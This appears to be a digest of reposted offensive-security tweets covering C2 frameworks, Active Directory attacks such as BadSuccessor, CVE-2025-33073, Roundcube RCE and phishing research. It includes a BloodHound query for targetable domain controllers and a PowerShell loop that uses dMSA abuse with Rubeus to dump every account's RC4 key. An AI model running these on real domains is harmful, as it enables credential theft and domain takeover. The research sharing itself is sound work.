[ Bad Sector Labs @badsectorlabs ]
Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on Ludus with our new role:
https://github.com/badsectorlabs/ludus_adaptix_c2
[ tweet ]
[ mpgn @mpgn_x64 ]
Thanks to the awesome work of @LadhaAleem, the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public!
You can build the lab and pwn the AD: 13 flags to capture! No public write-up exists yet, waiting for someone to submit one!
https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024
[ tweet ]
[ Matt Ehrnschwender @M_alphaaa ]
I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 and I have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.
https://github.com/MythicAgents/tetanus
[ tweet ]
Whoa.
If only everything in the world could be rewritten in Rust.
[ Steve S. @0xTriboulet ]
rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.
https://github.com/0xTriboulet/rssh-rs
[ tweet ]
[ Yehuda Smirnov @yudasm_ ]
What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:
https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/
[ tweet ]
[ Yuval Gordon @YuG0rd ]
We just released my research on BadSuccessor, a new unpatched Active Directory privilege escalation vulnerability.
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it.
Read here:
https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
[ tweet ]
[ Bad Sector Labs @badsectorlabs ]
[ quote ]
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group)
WHERE g.objectsid ENDS WITH '-516'
WITH COLLECT(c1.name) AS dcs
MATCH (c2:Computer)
WHERE c2.enabled = true AND (c2.operatingsystem CONTAINS '2025') AND (c2.name IN dcs)
RETURN c2.name
If this query hits, you're in.
[ tweet ][ quote ]
[ mpgn @mpgn_x64 ]
Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions.
https://github.com/Pennyw0rth/NetExec/pull/702
[ tweet ][ quote ]
[ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
https://github.com/cybrly/badsuccessor
[ tweet ]
[ Yuval Gordon @YuG0rd ]
Many missed this on #BadSuccessor: it's also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal: krbtgt, users, machines. No DCSync required, no code execution on DC.
[ tweet ]
Absolutely devastating.
upd. By the way, the author does something like this, using his own build of Rubeus:
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
    + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    # Invoke-Rubeus and $kirbi come from the author's own Rubeus build and session; they are not defined in this snippet
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
[ Matt Ehrnschwender @M_alphaaa ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
https://github.com/MEhrn00/boflink
Supporting blog post about it.
https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
[ tweet ]
Forwarded from PT SWARM
We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube, update immediately!
[ Aditya Telange @adityatelange ]
evil-winrm-py v1 released
https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
[ tweet ]
[ Fabian @testert01 ]
Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
https://nothingspecialforu.github.io/UCgMSAExploitation/
[ tweet ]
[ mr.d0x @mrd0x ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
https://mrd0x.com/spying-with-chromium-browsers-camera/
[ tweet ]
[ James Woolley @Xtrato ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions.
[ tweet ]
[ RedTeam Pentesting @RedTeamPT ]
Our new blog post about Windows CVE-2025-33073, which we discovered, is live.
The Reflective Kerberos Relay Attack: remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
We have also released a paper which really goes into the nitty-gritty for those who are interested:
https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
[ tweet ]
[ Synacktiv @Synacktiv ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Check out the details in the blog post by @yaumn_ and @wil_fri3d.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
[ tweet ]
[ Praetorian @praetorianlabs ]
New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
Blog covers methodology, red team case studies & detection strategies
https://www.praetorian.com/blog/introducing-github-device-code-phishing/
[ tweet ]